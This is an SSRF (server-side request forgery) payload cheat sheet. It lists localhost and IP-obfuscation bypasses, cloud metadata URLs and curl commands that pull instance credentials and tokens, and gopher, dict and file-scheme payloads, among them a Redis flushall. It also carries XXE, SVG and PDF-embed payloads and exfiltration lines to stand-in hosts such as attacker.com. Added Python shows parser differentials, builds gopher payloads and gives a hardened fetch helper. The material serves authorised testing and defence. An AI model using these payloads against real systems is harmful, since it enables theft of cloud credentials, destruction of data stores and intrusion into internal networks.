SSRF (Server-Side Request Forgery) Payloads

Server-Side Request Forgery (SSRF) is a web vulnerability in which an attacker makes the server-side application issue a request to a destination of the attacker's choosing, typically one the attacker cannot reach directly. Because the request leaves from the server, it carries the server's network position and implicit trust: internal admin interfaces, cloud instance-metadata services (and the credentials they hand out) and other back-end hosts become reachable, and the internal network can be mapped from differences in response time, status or error text. The payloads below are grouped by what they test: reaching internal addresses, bypassing filters, abusing non-HTTP URL schemes, and detecting blind SSRF.

Basic SSRF

Localhost Variations

http://localhost
http://127.0.0.1
http://127.1
http://0.0.0.0
http://[::]
http://[0000::1] (IPv6 literals must be bracketed in a URL)
http://[::1]

Internal Network Scanning

http://192.168.0.1
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
http://169.254.169.254

Bypass Techniques

IP Address Obfuscation

Decimal Format

The whole address written as one 32-bit integer (a.b.c.d = a*16777216 + b*65536 + c*256 + d):

http://2130706433 (127.0.0.1)
http://3232235521 (192.168.0.1)
http://167772161 (10.0.0.1)

Octal Format

A leading 0 makes a part (or the whole number) octal:

http://017700000001 (127.0.0.1 as a single 32-bit octal number)
http://0177.0.0.1 (0177 octal = 127)

Hexadecimal Format

http://0x7f000001 (127.0.0.1)
http://0x7f.0.0.1
http://0x7f.0x0.0x0.0x1
http://0xc0a80001 (192.168.0.1)

Shortened and Zero-Padded Forms

inet_aton() accepts one to four parts, and the last part fills all remaining bytes:

http://127.0.0.1
http://127.000.000.001 (zero-padded parts are read as octal, which for 000 and 001 gives the same value)
http://127.0.1 (three parts: the last one fills the remaining 16 bits)
http://127.1 (two parts: the last one fills the remaining 24 bits)
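All of the spellings above work because two parsers disagree about the same string. As an added illustration (not part of the original cheat sheet), the Python below re-implements the permissive inet_aton() grammar that libc and curl apply to numeric hosts, then shows what a strict parser (Python's ipaddress module) makes of the same strings and what the permissive form actually resolves to. Nothing is sent over the network; the payload list is taken from the sections above.

```python
import ipaddress
import re

# Added example, not taken from the original cheat sheet: a re-implementation of
# the permissive BSD inet_aton() grammar used by libc, curl and most HTTP clients.
# It accepts 1 to 4 dot-separated parts, each decimal, octal (leading 0) or hex
# (0x...), and the last part fills every remaining byte. Strict parsers such as
# Python's ipaddress module reject most of these spellings, so a validator that
# uses one and a client that uses the other disagree about what "127.1" means.

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")          # "0", "00", "0177" ... ("08" matches nothing and is rejected)
_DEC = re.compile(r"[1-9][0-9]*")


def inet_aton_like(host):
    """Return an IPv4Address for any inet_aton-style literal, or None if it is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if _HEX.fullmatch(part):
            values.append(int(part[2:], 16))
        elif _OCT.fullmatch(part):
            values.append(int(part, 8))
        elif _DEC.fullmatch(part):
            values.append(int(part, 10))
        else:
            return None                    # contains a non-numeric label, e.g. a DNS name
    *head, last = values
    if any(v > 0xFF for v in head):
        return None
    remaining_bits = 8 * (4 - len(head))   # the final part supplies all remaining bytes
    if last >= 1 << remaining_bits:
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    return ipaddress.IPv4Address((packed << remaining_bits) | last)


def strict_parse(host):
    """What a strict validator sees: ipaddress accepts only a canonical dotted quad."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def classify(host):
    """Canonicalize with the permissive grammar first, then classify the real target."""
    addr = inet_aton_like(host)
    if addr is None:
        return "not an IPv4 literal"
    if addr.is_loopback:
        return f"{addr} loopback"
    if addr.is_link_local:
        return f"{addr} link-local (cloud metadata range)"
    if addr.is_unspecified:
        return f"{addr} unspecified (0.0.0.0 connects to local services on Linux)"
    if not addr.is_global:
        return f"{addr} private or reserved"
    return f"{addr} public"


# The spellings from the IP Address Obfuscation sections above.
PAYLOADS = [
    "127.0.0.1", "127.1", "127.0.1", "127.000.000.001",
    "2130706433", "017700000001", "0177.0.0.1",
    "0x7f000001", "0x7f.0.0.1", "0x7f.0x0.0x0.0x1",
    "3232235521", "0xc0a80001", "167772161",
    "0.0.0.0", "169.254.169.254", "100.100.100.200",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        strict = strict_parse(p)
        print(f"{p:18} strict={'REJECTED' if strict is None else str(strict):16} permissive={classify(p)}")
```

The lesson for a defender is the order of operations: canonicalize with the permissive grammar (or let the real resolver do it) and only then compare against the block rules; a denylist that matches the literal string "127.0.0.1" catches none of these.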

DNS-Based Bypass

Any name whose A record points at an internal address defeats a filter that only inspects the literal host string; the filter has to resolve the name and check the result.

http://localhost.company.com (only if such a record exists and resolves to 127.0.0.1)
http://127.0.0.1.nip.io (public wildcard DNS that resolves to the embedded address)
http://127.0.0.1.xip.io (same idea; xip.io has since been shut down, so use nip.io or a zone you control)
http://evil.com (attacker-controlled zone with an A record for 127.0.0.1 or any internal IP)
http://spoofed.burpcollaborator.net (Collaborator names resolve to Burp's own server, so this confirms that a lookup happens rather than bypassing a filter)

URL Encoding

Percent-encoding the host helps when the validator compares the raw string but a later layer (client library, proxy, framework) decodes it first.

http://127.0.0.1
http://%31%32%37%2e%30%2e%30%2e%31 (decodes to 127.0.0.1)
http://127.0.0.1%2F (encoded slash after the host)
http://127.0.0.1%00 (encoded NUL; some parsers truncate the host here)

Double URL Encoding

http://%2531%2532%2537%252e%2530%252e%2530%252e%2531 (decodes once to %31%32%37%2e%30%2e%30%2e%31 and a second time to 127.0.0.1; works when two components each decode once)

Using @ Symbol

For an RFC 3986 parser everything between "//" and the last "@" is userinfo, so the request goes to the host after the "@". Validators built on a regex or substring match often read the first name instead; these payloads only work when the validator and the HTTP client disagree.

http://expected-host@evil-host (client connects to evil-host)
http://evil-host@expected-host (client connects to expected-host; trips validators that take the first name)
http://expected-host:ignored@evil-host
https://expected-host:fakepassword@evil-host

Using # Symbol

http://evil-host#expected-host (the fragment is never sent; client connects to evil-host)
http://evil-host?@expected-host (the query starts before the "@", so there is no userinfo at all)

Open Redirect Bypass

Works when the allowlist admits trusted-domain.com, the client follows redirects, and only the first URL is validated.

http://trusted-domain.com/redirect?url=http://169.254.169.254
http://trusted-domain.com/redirect?url=http://localhost

CRLF Injection

Applies when the URL is written into a raw protocol stream (an HTTP/1.1 request line, SMTP, memcached) without encoding: the injected CRLF ends the current line and the attacker's text becomes the next header or command.

http://127.0.0.1%0d%0aHeader:%20value
http://example.com%0d%0a%0d%0a<script>alert(1)</script> (response splitting into the body; this is an XSS outcome rather than SSRF)

Host Confusion (Parser Differentials)

http://evil.com\.trusted.com (WHATWG parsers, as used by browsers and headless renderers, treat "\" as "/", so the host is evil.com; RFC 3986 libraries keep the backslash inside the host)
http://trusted.com.evil.com (defeats "contains trusted.com" checks and "ends with trusted.com" checks that forget the leading dot)
http://trusted.com%252f@evil.com (double-encoded slash inside the userinfo; the host is evil.com)
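The same validator-versus-client disagreement, this time for the "@", "#" and host-suffix tricks above, as an added example that is not part of the original cheat sheet. Python's urlsplit stands in for an RFC 3986 client (urllib and requests build on it); expected-host and evil-host are the page's placeholders, not real hosts, and the naive validator is the kind of substring check these payloads defeat.

```python
import re
from urllib.parse import urlsplit

# Added example, not part of the original cheat sheet. It puts a typical broken
# validator next to the host an RFC 3986 parser actually connects to, using the
# placeholder names from the sections above.


def naive_allows(url, expected):
    """Broken validator: is the expected name anywhere in the text after 'scheme://'?"""
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/]*)", url, re.I)
    return m is not None and expected in m.group(1)


def real_host(url):
    """Host an RFC 3986 client connects to; userinfo, '?' and '#' are never part of it."""
    return urlsplit(url).hostname


def strict_allows(url, expected):
    """Correct check: parse, refuse userinfo, then compare the whole hostname exactly."""
    p = urlsplit(url)
    return (
        p.scheme in ("http", "https")
        and p.username is None and p.password is None
        and p.hostname == expected
    )


PAYLOADS = [
    "http://expected-host@evil-host",           # userinfo trick from "Using @ Symbol"
    "http://evil-host@expected-host",           # reversed: goes to expected-host, sends "evil-host" as a username
    "http://expected-host:ignored@evil-host",
    "http://evil-host#expected-host",           # fragment trick from "Using # Symbol"
    "http://evil-host?@expected-host",          # '?' ends the authority before the '@'
    "http://expected-host.evil-host",           # suffix/subdomain confusion
    "http://expected-host%252f@evil-host",      # double-encoded slash inside the userinfo
    "http://evil-host\\.expected-host",         # urlsplit keeps '\' in the host; WHATWG parsers treat it as '/'
]


def audit(expected="expected-host"):
    """For each payload: (url, naive verdict, host really contacted, strict verdict)."""
    return [(u, naive_allows(u, expected), real_host(u), strict_allows(u, expected)) for u in PAYLOADS]


if __name__ == "__main__":
    for url, naive, host, strict in audit():
        print(f"{url:42} naive={naive!s:5} connects_to={host!s:28} strict={strict}")
```

Every payload passes the naive check and fails the strict one. The backslash case is the one to remember when the fetcher is a browser engine (PDF generators, screenshot services): there the host becomes evil-host, so the validation must run in a parser that follows the same rules as the component that will make the request.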

Cloud Metadata

AWS

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/admin (replace "admin" with a role name returned by the listing above; the response contains AccessKeyId, SecretAccessKey and Token)
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/dynamic/instance-identity/document

AWS IMDSv2 (Requires Token)

# IMDSv2 needs a PUT with a custom header before any metadata GET, so a GET-only SSRF with no control over
# method or headers cannot read it (unless a scheme such as gopher:// lets you write a raw request). The token
# response also has a default hop limit of 1, which stops it reaching a process behind one extra network hop.
# First, get a token (TTL in seconds, 21600 is the maximum)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Then present the token on every metadata request
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

Google Cloud

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1/project/project-id
# Requires header: Metadata-Flavor: Google (requests without it are denied), so a GET-only SSRF with no
# header control cannot read it; the legacy v1beta1 endpoint that did not require the header has been retired

http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
# Same service addressed by IP; the legacy alternative header was X-Google-Metadata-Request: True

Azure

http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Requires header: Metadata: true; requests that carry an X-Forwarded-For header are rejected, so
# the service cannot be reached through a forwarding proxy that adds one

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# Returns a managed-identity access token for the requested resource; same Metadata: true header

Digital Ocean

http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region

Oracle Cloud

http://169.254.169.254/opc/v1/instance/
http://169.254.169.254/opc/v1/instance/metadata/
# The v2 endpoints under /opc/v2/ require the header Authorization: Bearer Oracle

Alibaba Cloud

http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/ram/security-credentials/

Port Scanning

http://localhost:22
http://localhost:80
http://localhost:443
http://localhost:3306
http://localhost:5432
http://localhost:6379
http://localhost:8080
http://localhost:8443
http://localhost:9200
http://127.0.0.1:1-65535 (iterate over ports; tell open from closed by response time, status code or error text, since the body is usually not returned)

Protocol Handlers

File Protocol

file:///etc/passwd
file:///c:/windows/win.ini
file://server/share/file.txt (UNC path as a file URL; on Windows the server opens an SMB connection to "server", which a listener can use to capture NetNTLM authentication)

Dict Protocol

# curl sends the path as one line after a CLIENT banner (with ":" turned into spaces), so a single
# arbitrary command reaches any line-based TCP service
dict://localhost:11211/stats (memcached)
dict://127.0.0.1:6379/info (Redis)

SFTP Protocol

sftp://localhost:22/

TFTP Protocol

tftp://localhost:69/file

LDAP Protocol

ldap://localhost:389
ldap://localhost:389/dc=example,dc=com

Gopher Protocol

# The character after "/" is the gopher item type and is discarded; everything after it is percent-decoded
# and written to the socket verbatim, so spaces and line breaks must be encoded (%20, %0d%0a)
gopher://localhost:80/_GET%20/%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0a
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
gopher://localhost:25/_MAIL%20FROM:<attacker@evil.com>%0d%0a
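The page lists gopher payloads but not how they are assembled. The following is an added example (not from the original cheat sheet or from any tool it names) that builds them: it percent-encodes arbitrary bytes behind the dummy item type, encodes Redis commands in RESP, and wraps a complete HTTP/1.1 request so that method and headers are under the tester's control. The hosts and ports are the page's own; the final call reuses the IMDSv2 token endpoint from the AWS section above to show why gopher matters there.

```python
from urllib.parse import quote, unquote_to_bytes

# Added example, not part of the original cheat sheet: how the gopher:// payloads
# above are constructed. curl (and libcurl-based fetchers) take the URL path, drop
# the single "item type" character after the "/" (the "_" used above), percent-decode
# the rest and write those bytes to the TCP socket as-is. That turns any SSRF that
# allows the gopher scheme into a raw TCP client for line-based protocols such as
# Redis, SMTP or HTTP itself.


def gopher_url(host, port, raw):
    """Wrap arbitrary bytes in a gopher URL; '_' is a throwaway item type."""
    # safe="" so that '/', ' ', ':' and CR/LF are all percent-encoded
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")


def gopher_payload(url):
    """Inverse: the bytes a gopher client puts on the wire for this URL."""
    return unquote_to_bytes(url.split("/_", 1)[1])


def resp_encode(*args):
    """One Redis command as a RESP array: *<argc>, then $<len> and the bytes for each argument."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)


def redis_gopher(host, port, *commands):
    """Several RESP commands back-to-back in one URL, e.g. ("flushall",) as listed above."""
    return gopher_url(host, port, b"".join(resp_encode(*c) for c in commands))


def http_gopher(host, port, method, path, headers=None):
    """A complete HTTP/1.1 request, so method and headers are chosen by the sender, not the SSRF sink."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    return gopher_url(host, port, ("\r\n".join(lines) + "\r\n\r\n").encode())


if __name__ == "__main__":
    # The Redis payload listed above, regenerated
    print(redis_gopher("127.0.0.1", 6379, ("flushall",)))
    # The "GET / HTTP/1.1" payload above with spaces and CRLFs encoded properly
    print(http_gopher("localhost", 80, "GET", "/"))
    # Same mechanism against the IMDSv2 token endpoint, which needs a PUT and a custom header
    print(http_gopher("169.254.169.254", 80, "PUT", "/latest/api/token",
                      {"X-aws-ec2-metadata-token-ttl-seconds": "21600"}))
```

quote() emits upper-case hex (%0D%0A rather than %0d%0a); both decode identically. The RESP encoder is what tools such as Gopherus automate: the length prefixes must match the argument bytes exactly or Redis rejects the command.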

SMB/UNC Paths (Windows)

\\localhost\c$\windows\win.ini
\\127.0.0.1\share
file://server/share

SSRF in Different Contexts

PDF Generation

<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"></iframe>
<img src="http://localhost/admin">
<link rel="stylesheet" href="file:///etc/passwd">

XML Parsers

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<foo>&xxe;</foo>

SVG Files

<svg xmlns="http://www.w3.org/2000/svg">
<image href="http://169.254.169.254/latest/meta-data/"/>
</svg>

Video/Audio

<video src="http://localhost/admin"></video>
<audio src="http://169.254.169.254/latest/meta-data/"></audio>

Email (SMTP)

http://localhost:25/
gopher://localhost:25/_MAIL%20FROM:attacker@evil.com

Webhooks

{"url": "http://169.254.169.254/latest/meta-data/"}
{"webhook_url": "http://localhost:6379/"}

Blind SSRF

Time-Based Detection

On a cloud host the metadata service answers immediately, while an unused link-local address hangs until the client times out, so response time alone reveals whether an address is reachable:

http://169.254.169.254 (should respond quickly)
http://169.254.169.1 (may time out)

DNS Exfiltration

http://attacker.burpcollaborator.net
http://collaborator.burpcollaborator.net
http://<data>.attacker.com (put the exfiltrated value in a subdomain label; the DNS lookup happens even when the HTTP request itself is blocked by egress filtering, so this also detects blind SSRF)

Out-of-Band (OOB)

http://webhook.site/unique-id
http://requestbin.net/unique-id
http://attacker.com/?data=exfiltrated

Advanced SSRF

Bypassing Allowlists

http://allowed-domain.com@evil.com
http://evil.com#allowed-domain.com
http://allowed-domain.com.evil.com

Bypassing Denylists (blocklists)

# If 127.0.0.1 is blocked
http://127.1
http://0.0.0.0
http://localhost
http://[::1]
http://2130706433

# If localhost is blocked
http://localtest.me
http://127.0.0.1.nip.io
http://0x7f000001

Redirect Chains

# Host a redirect on your server; works when the client follows redirects but only the first URL is validated
http://evil.com/redirect → 302 Location: http://169.254.169.254/

DNS Rebinding

  1. Register a domain you control and serve its records with a very low (or zero) TTL
  2. The first lookup, made by the validator, returns an allowed public IP
  3. The answer then changes to an internal IP (127.0.0.1, 169.254.169.254, ...)
  4. The HTTP client resolves the name a second time and connects to the internal IP: the check and the use were made on different answers (a TOCTOU race). Defence: resolve once, validate every returned address, and connect to the validated IP while sending the hostname in the Host header

Prevention Best Practices

  1. Input Validation: Parse the URL with the same library the HTTP client uses, then check scheme, host and port individually; never rely on substring or regex matches against the raw string
  2. Allowlist: Prefer an allowlist of permitted schemes (http/https only), ports and destination hosts; denylists of IP spellings are defeated by the obfuscation forms above
  3. Resolve Then Check: Resolve the host, reject the request if any returned address is loopback, link-local, private, CGNAT (100.64.0.0/10) or an IPv4-mapped IPv6 address, and connect to that validated address (pinning) so a second lookup cannot be rebound
  4. Network Segmentation: Isolate sensitive services; on AWS enforce IMDSv2 (token required) so a forged GET cannot read instance credentials
  5. Disable Unused Protocols: Disable file://, gopher://, dict://, ftp:// and any other scheme the client library supports but the feature does not need
  6. Redirects: Disable automatic redirects, or re-run the full validation on every hop
  7. Authentication: Require authentication for internal services; do not treat "only reachable from inside" as a control
  8. Response Validation: Check response content type and size, and do not return raw responses to the user unless the feature requires it
  9. Egress Filtering: Block outbound connections to private and link-local ranges at the network layer as a second line of defence
  10. Use Libraries Safely: Configure HTTP clients with timeouts, no redirects and a scheme allowlist; one hardened "fetch this URL" helper that every feature calls beats per-call checks
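Putting the list into code: the following added example (not part of the original cheat sheet) is a server-side fetch helper that applies these rules, including the resolve-once-and-pin step that closes the DNS rebinding race described above and re-validation of every redirect hop. The resolver is injectable; FAKE_DNS holds constructed answers for an offline demo and the hostnames in it are not real. Production use keeps the default system_resolver, which also canonicalizes the numeric spellings from the obfuscation section because getaddrinfo() goes through inet_aton().

```python
import http.client
import ipaddress
import socket
import ssl
from typing import Callable, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# Added example, not part of the original cheat sheet. The resolver is injectable so the
# checks run offline; FAKE_DNS holds constructed answers and its hostnames are not real.

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Every A/AAAA answer; getaddrinfo() also canonicalizes literals such as 127.1 or 0x7f000001."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_ip(ip: str) -> bool:
    """False for loopback, link-local (169.254.0.0/16), RFC 1918, CGNAT (100.64/10), ULA, multicast, 0.0.0.0."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                      # judge ::ffff:10.0.0.1 as 10.0.0.1
    return addr.is_global and not addr.is_multicast


def validate_and_pin(url: str, resolver: Resolver = system_resolver) -> Tuple[str, str, int]:
    """Return (hostname, pinned_ip, port) for an acceptable URL, else raise ValueError with the reason."""
    p = urlsplit(url)
    if p.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {p.scheme!r}")
    if p.username is not None or p.password is not None:
        raise ValueError("userinfo (user@host) not allowed")
    if not p.hostname:
        raise ValueError("missing host")
    port = p.port or (443 if p.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    addrs = resolver(p.hostname)
    if not addrs:
        raise ValueError("name did not resolve")
    bad = [a for a in addrs if not is_public_ip(a)]
    if bad:                                          # a single internal answer is enough to refuse
        raise ValueError(f"{p.hostname} resolves to non-public address(es) {bad}")
    return p.hostname, addrs[0], port


def rejection_reason(url: str, resolver: Resolver = system_resolver) -> Optional[str]:
    """None when the URL passes, otherwise the reason it was refused."""
    try:
        validate_and_pin(url, resolver)
        return None
    except ValueError as e:
        return str(e)


def fetch_pinned(url: str, resolver: Resolver = system_resolver, max_hops: int = 3, max_bytes: int = 1 << 20) -> bytes:
    """GET over a socket connected to the validated IP; every redirect hop is validated again."""
    for _ in range(max_hops):
        host, ip, port = validate_and_pin(url, resolver)
        p = urlsplit(url)
        sock = socket.create_connection((ip, port), timeout=5)       # TCP to the address we checked, no fresh lookup
        if p.scheme == "https":                                      # SNI and certificate check still use the name
            sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
        conn = http.client.HTTPConnection(host, port)
        conn.sock = sock                                             # pre-connected socket: http.client will not resolve
        conn.request("GET", (p.path or "/") + (f"?{p.query}" if p.query else ""), headers={"Host": host})
        resp = conn.getresponse()
        if resp.status in (301, 302, 303, 307, 308):                 # http.client never follows on its own
            url = urljoin(url, resp.getheader("Location", ""))
            conn.close()
            continue                                                 # the next hop gets the full check
        return resp.read(max_bytes)                                   # bound the size regardless of Content-Length
    raise ValueError("too many redirects")


FAKE_DNS = {  # constructed answers for the offline demo
    "hooks.partner.example": ["93.184.216.34"],                          # a public address
    "rebind.attacker.example": ["93.184.216.35", "169.254.169.254"],     # public and metadata IP in one answer
    "localtest.me": ["127.0.0.1"],
    "v6mapped.attacker.example": ["::ffff:10.0.0.1"],
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ["http://hooks.partner.example/cb", "http://hooks.partner.example@localtest.me/",
              "gopher://hooks.partner.example:80/_x", "http://localtest.me/", "http://rebind.attacker.example/",
              "http://v6mapped.attacker.example/", "http://hooks.partner.example:6379/"]:
        reason = rejection_reason(u, fake_resolver)
        print(f"{u:45} {'OK ' + str(validate_and_pin(u, fake_resolver)) if reason is None else 'REJECTED: ' + reason}")
```

The two design points that a plain "check the IP" filter misses are both here: the TCP connection goes to the address that was validated (so a TTL-0 rebind between lookup and connect changes nothing), and the redirect is handled by the caller rather than the library, so each Location target passes through validate_and_pin() again. When a feature genuinely needs internal destinations, add a separate, tightly scoped helper rather than widening this one.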

Testing Tools

  • SSRFmap - Automated SSRF testing
  • Burp Collaborator - Out-of-band testing
  • Interactsh - OOB interaction server
  • Gopherus - Gopher protocol payload generator
  • SSRFTest - SSRF detection tool

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.